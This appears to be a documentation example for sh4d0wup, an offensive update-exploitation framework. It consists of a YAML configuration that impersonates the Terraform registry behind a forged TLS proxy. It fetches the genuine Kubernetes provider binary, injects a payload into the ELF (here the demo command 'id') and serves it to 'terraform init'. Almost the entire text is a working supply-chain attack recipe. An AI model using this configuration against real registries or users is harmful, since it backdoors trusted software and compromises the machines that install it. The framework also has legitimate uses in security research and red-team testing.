sh4d0wup 0.11.0

Signing-key abuse and update exploitation framework
Documentation
---

upstreams:
  registry:
    url: https://registry.terraform.io/

check:
  image: docker.io/hashicorp/terraform
  install_certs: ['tee', '-a', '/etc/ssl/certs/ca-certificates.crt']
  register_hosts:
    - registry.terraform.io
  cmds:
    - |
      echo '
      terraform {
        required_providers {
          test = {
            source = "registry.terraform.io:'${SH4D0WUP_BOUND_PORT}'/hashicorp/kubernetes"
          }
        }
      }' > main.tf
    - ["terraform", "init"]

tls:
  names: ["registry.terraform.io"]

artifacts:
  kubernetes_provider_zip_upstream:
    type: url
    url: https://releases.hashicorp.com/terraform-provider-kubernetes/2.16.1/terraform-provider-kubernetes_2.16.1_linux_amd64.zip
    sha256: 06224975f5910d41e73b35a4d5079861da2c24f9353e3ebb015fbb3b3b996b1c
  kubernetes_provider_elf_upstream:
    type: extract
    extract: zip
    artifact: kubernetes_provider_zip_upstream
  kubernetes_provider_elf_infected:
    type: infect
    infect: elf
    artifact: kubernetes_provider_elf_upstream
    payload: id

routes:
  - type: proxy
    args:
      upstream: registry